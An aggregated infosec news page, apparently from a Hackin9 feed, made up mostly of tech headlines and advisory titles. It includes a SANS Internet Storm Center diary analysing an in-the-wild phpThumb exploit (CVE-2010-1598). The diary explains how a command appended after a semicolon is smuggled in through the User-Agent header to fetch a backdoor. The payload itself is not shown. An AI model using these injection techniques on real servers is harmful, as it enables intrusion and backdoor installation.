Hackin9

InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Google CEO Larry Page published a long public letter on Thursday that gives an update on the company's strategy and highlights some of the conflicts he faces after a year at the head of the company.
 
Intel has started shipping a new series of small-capacity solid-state drives (SSDs) that can be used in laptops to reduce boot times and load applications more quickly.
 
Microsoft?s six bulletins include critical server repairs, Internet Explorer updates and a critical update of its .NET Framework.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
What can Netflix teach enterprises about data center operations and always-on reliability? Netflix is a consumer-facing Web shop with only a few applications--a completely different infrastructure challenge, right? Wrong. CIO.com's Bernard Golden explains the lessons to be learned from Netflix's data center transformation.
 
At one point last year, it looked as if the popular open-source MySQL database was in danger of having no user conference. Now it has two.
 
Facebook will list its stock on the NASDAQ stock exchange following what some observers say is he most anticipated IPO in a decade, according to a report today in the New York Times.
 
Cloud networking startup Pertino Networks announced this week that it has finalized a Series A round of funding in cooperation with Norwest Venture Partners and Lightspeed Venture Partners.
 
IBM and Red Hat could soon be joining the ranks of OpenStack supporters, giving the open source cloud project a big boost.
 
It's been an interesting past few weeks for OpenStack.
 
The online feminist group Ultraviolet launched a petition on Thursday demanding that Facebook appoint a woman to its all-male board before it becomes a publicly traded company.
 
The Jumpstart Our Business Startups had some provision that will directly impact Rally Software, especially if it decides to go public, says CEO Tim Miller.
 
If I use the term "Ultrabook," you picture a very particular kind of laptop, don't you? It's super thin, sleek, and light. It's small enough to fit in a small shoulder bag or large purse...something very much like the Macbook Air. This is the image Intel has tried to cultivate for its Ultrabook brand. If you go to Intel's own Ultrabook site, you see a rendered faux-laptop that could almost be mistaken for Apple's. What about a 15.6-inch laptop that weighs as much as a Macbook Air, iPad, and smartphone combined? Would you call that an Ultrabook? Intel would.
 
This topic has come up before, but it is probably worthwhile noting that of course, any data provided by the user can be used against a web application, not just proper POST and GET data. For example, we had a couple readers point us to a recent blog post in http headers [1] and how many web application vulnerability scanners miss them.
Another reader (Thanks Ovi!) sent us an interesting example hiding the exploit in the browser's user agent field. The exploit is directed at the infamous phpThumb tool, and again, isn't new (see for example the post by Spiderlabs [2]). The vulnerability was discovered originally in 2010 and assigned CVE-2010-1598. The bug wasn't fixed until about a year ago when version 1.7.10 of phpThumb was released [3].
Let's take a quick look at the mechanics of this exploit and the vulnerability. First of all, the exploit's User Agent: (I formatted it for readability, but the pel command, which IMHO is a typo, came from the original.


?--[... second attempt in same user agent omitted ...]
Googlebot/2.1 (+http://www.google.com/bot.html)


In essence, the script appears to install some for of backdoor. The original servers the exploit connected to is no longer accepting requests, so we couldn't test it. The script uses wget as well as curl to download the file in case one of these scripts is not installed.
Now here comes the interesting part: The User Agent is actually not used by phpThumb. Instead, the actual exploit happens in the POST data (which is why you are still seeing the POST method used. However, the POST data is somewhat validated, not allowing it to contain the full exploit script. Instead, the function executed by the POST method will then refer to the HTTP_USER_AGENT environment variable, and pull its content and execute it. Some of the other discussions of this bug are missing this important aspects of this exploit.
Here is a quick outline of the code, and what went wrong:
First of all, the fltr parameter is parsed. Multiple filters may be provided, but for the purpose of this exploit, one is all it takes. Each filter contains a command, and a parameter. They are delimited by a pipe (|
Dont' get your hopes up based on the name of the function (SafeExec). Its main purpose is to figure out which one of the various ways of code execution are allowed.
The only hurdle the attacker has to overcome is to create an exploit that will first run the ImageMagick command successfully, then append the malicious command with a semicolon. The semicolon is never filtered. Many of these exploits don't even bother with the additional user agent obfuscation. The googlebot part of the header is likely only included to sneak past weak web application firewall configurations that may ignore traffic from Google (the IP address this exploit came from is not associated with Google).
[1]http://resources.infosecinstitute.com/sql-injection-http-headers/

[2]http://blog.spiderlabs.com/2011/12/honeypot-alert-user-agent-field-arbitrary-php-code-execution.html

[3]http://phpthumb.sourceforge.net/demo/docs/phpthumb.changelog.txt
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Two employees of Indian outsourcer Tata Consultancy Services (TCS) have won class action status for a lawsuit alleging that the company made deductions from their wages in breach of their contract while they were working in the U.S. A judge in the U.S. District Court for the Northern District of California granted their suit class action status on Monday.
 
Earlier this week, Instagram--the beloved iPhone app for snapping, filtering, and sharing photographs--arrived on Android phones, nearly a year and half after the iPhone app's initial release. Until that time, folks using Android phones could only look on longingly as their iPhone-wielding friends snapped and shared photos on the growing network, which topped 30 million members before making the leap to Android.
 
President Barack Obama has signed legislation that eliminates restrictions preventing entrepreneurs from seeking crowdsourced funding online and removes some other financial regulations for small businesses.
 
It would seem the missing iPhone prototype wasn't "priceless," after all. Apple has apparently reached an out-of-court settlement to keep a San Francisco man from suing the company over what his attorney -- and virtually everyone else -- called an "outrageous" warrantless search of the man's home, car and computer last summer by two Apple employees accompanied by four city police officers.
 
Cisco has rolled out a new line of home Wi-Fi routers that embed application intelligence for managing devices connected to the home network.
 
Multiple Toshiba e-Studio Devices Security Bypass Vulnerability
 
Nokia's Lumia 900 smartphones will reach AT&T stores on Sunday for $99.99, and one analyst said it could be the start of something big: Windows Phone as a market disrupter between the successful iPhone and Android phones.
 
Complaints from owners of Apple's newest iPad that their device has trouble connecting to wireless networks continue to mount.
 
Think that coffee-shop Wi-Fi hotspot is secure? Think again. Most public hotspots, including those at airports, hotels, and even Starbucks, aren't secure at all. In fact, when your laptop connects to one of these networks, it's easy pickings for hackers -- even if you have a firewall installed.
 
Microsoft said it would issue six security updates next week, four of them critical, to patch 11 bugs in Windows, Internet Explorer, Office, SQL Server and its virtual private networking platform.
 
PC maker Eurocom has crammed some of the latest server technologies, including an eight-core Intel Xeon processor, into a laptop that the company calls a "mobile server."
 
I have a degree in Linguistics. (But I have a job anyway! Rimshot!) So I have some training in arguing about semantics.
 
Hewlett-Packard CEO Meg Whitman's bruising run for governor of California left her with a quality that she needs as she seeks to turn around the computer giant: very "thick skin," she told the Simmons Leadership Conference in Boston on Thursday.
 
If you want to know what to buy, talk to people who've adopted the technology you're eyeing. Here are key questions to ask. Insider (registration required)
 
[security bulletin] HPSBUX02760 SSRT100805 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
 
[security bulletin] HPSBUX02758 SSRT100774 rev.1 - HP-UX running DCE, Remote Denial of Service (DoS)
 
[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4
 
[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0
 
[security bulletin] HPSBUX02757 SSRT100779 rev.2 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
 
A U.S. appeals court has resurrected a US$1 billion copyright case filed by Viacom against YouTube by sending the case back to trial by a jury.
 
Ubuntu developer Canonical is working on a new provisioning platform called Metal as a Service (MAAS), which will be used to activate new servers, on top of which a cloud can be deployed, founder Mark Shuttleworth said in a blog post.
 
Wordpress taggator plugin Sql Injection Vulnerabilities
 
Quest vWorkspace 7.5 Connection Broker Client ActiveX Control (pnllmcli.dll 7.5.304.547) SaveMiniLaunchFile() Method Remote File Creation / Overwrite
 
Sony Bravia Remote Denial of Service - CVE-2012-2210
 

It can't always be about hugging and grabbing an ice cream cone
CSO (blog)
A friend from another publication covered a panel discussion at the 2012 InfoSec World Conference and Expo yesterday, causing some controversy with his story. He wrote of conference attendees feeling insulted by the frank talk on the panel.

 
If you spend time online as part of your daily routine, you know that staying productive while browsing the Web is a challenge. Fortunately some great websites and browser extensions are available to help transform your browser into one of the most powerful productivity tools in your arsenal. Elsewhere we've discussed how to avoid tech distractions in your daily life; in this article we'll discuss three of the most popular productivity and time management systems, along with some great browser modifications to help you stick to them.
 
Dell plans to acquire Make Technologies, which specializes in helping businesses replace outdated IT systems, the company said Thursday, marking its third enterprise-related acquisition announcement this week.
 
The Windows Registry is a powerful but confusing component of the Windows operating system. In earlier editions of Windows, editing the Registry was fraught with peril; if the user edited it with the wrong tool or altered a critical key, the result could be an inoperable Windows installation. Windows 7, however, is far more forgiving than its predecessors when it comes to modifying the Registry, if you use the built-in Windows 7 Registry Editor (Regedit).
 
More than 600,000 Macs have been infected with a new version of the Flashback Trojan horse that's being installed on people's computers with the help of Java exploits, security researchers from Russian antivirus vendor Doctor Web said on Wednesday.
 
The takedown of Edward Pearson is said to be part of a larger crackdown on cybercrime in the UK.
 
iPhoto for iOS is not only a joy to use, it's easy to learn--even if you've never used the desktop verion of iPhoto '11.
 
Quest Toad for Oracle Explain Plan Display ActiveX Control (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite
 
[MATTA-2012-001] CVE-2012-1301; 0day; Open Proxy vulnerability in Umbraco 4.7
 
[ MDVSA-2012:054 ] libtiff
 
Re: Arbor Networks Peakflow SP web interface XSS
 
Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

--

Adam Swanger, Web Developer (GWEB, GWAPT)

Internet Storm Center https://isc.sans.edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

BOSTON — Privacy is a fog rolling in over the land. That’s how Jeff Northrup, IT director of the International Association of Privacy, described personal information privacy during his presentation at the SecureWorld conference last week. The fog is thick over some countries, especially in Europe, and rather light over the U.S., but that will change soon. Northrup advised IT professionals in the U.S. to draw a map through the fog now to avoid crashing into problems and penalties later. 

 

Evidence of a rapidly changing data privacy landscape is plentiful. The Obama administration just released its U.S. Privacy Bill of Rights, which would grant individuals more control over how their information is collected and managed, and increase transparency in privacy policies. Many observers believe it has a good chance of becoming law. Also, the FTC recently slapped Google and Facebook with penalties after users complained of privacy abuses; Google will now undergo 20 years of independent privacy audits, and Facebook may face similar chastisement from the FTC.

 

These incidents are just a few of the signs that security professionals need to amp up privacy projects before their organizations run afoul of current or future U.S. data privacy laws. Where to start? Northrup suggested organizations take an inventory of every piece of personal information it collects, and note why it is collected and where it is stored. This can be a daunting task, but many organizations already have some of the pieces in place as part of their compliance programs or DLP projects. Any information that does not have a clear business purpose (and the marketing team’s desire to send email blasts to a million relative strangers does not count as a “business purpose”) should be deleted or stored only on an as-needed, transient basis.

 

By taking steps toward greater transparency and giving users more control over how their information is used, organizations will be better prepared to navigate out of the fog.



Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 

SANS Secure Europe 2012
TechWeekEurope UK
SANS Secure Europe 2012, one of the region's largest infosec training events will be offering a new course this year to help business and technical staff learn the fundamentals of the audit process, governance, and compliance regulations, ...

and more »
 
Oracle CEO Larry Ellison said his company will continue to bet on selling high-end custom hardware for its software products, even amidst a growing trend toward roomfuls of cheap, generic servers.
 
With competition heating up in open source clouds, an analysis of community participation among four major projects shows that Eucalyptus - the oldest of those studied - has the largest standing community but OpenStack and CloudStack are gaining momentum in the developer community.
 
A total of 439 million households around the world had installed a Wi-Fi-based home network at the end of 2011, equivalent to 25% of all households, according to market research company Strategy Analytics.
 
Over the past few weeks i have been thinking good and hard about all this and how much time, effort, funds it has taken to get where it has.


 
Some of the largest names in the tech industry are funding patent 'trolls,' for protection from lawsuits and for access to the patent pool.
 
Google is deprecating the Master/Slave Datastore used by its cloud platform App Engine in favor of the High-Replication Datastore (HRD), which offers better reliability, the company said.
 
Samsung Electronics has started mass producing a microSD card that uses an Ultra High Speed-1 (UHS-1) interface to improve data transfer speeds, the company said on Wednesday.
 
IT managers faced with constrained budgets and a dearth of employees with technology skills are turning to cross-training programs to help develop workers with multiple skills.
 
The Obama administration's recent call for new codes of conduct for handling private consumer data on the Internet has evoked sharply different, if somewhat predictable, responses from rights groups and industry stakeholders.
 
Wireless carriers recently began offering LTE-ready phones at bargain-basement prices of less than $100, but those customers still must commit to paying a minimum of $60 a month, or $1,440 for two years of voice and data service.
 
libTIFF CVE-2012-1173 Remote Code Execution Vulnerability
 

SecureNinja Continues to Expand into International Markets by Appointing ...
Virtual-Strategy Magazine
Through this partnership, Sandline will be able to offer SecureNinja's extensive suite of InfoSec services and training offerings in Romania, as well as in the region. “We are proud to be appointed by SecureNinja as one of their official ...

and more »
 

SecureNinja Continues to Expand into International Markets by Appointing ...
PR Web (press release)
Through this partnership, Sandline will be able to offer SecureNinja's extensive suite of InfoSec services and training offerings in Romania, as well as in the region. “We are proud to be appointed by SecureNinja as one of their official ...

and more »
 
Internet Storm Center Infocon Status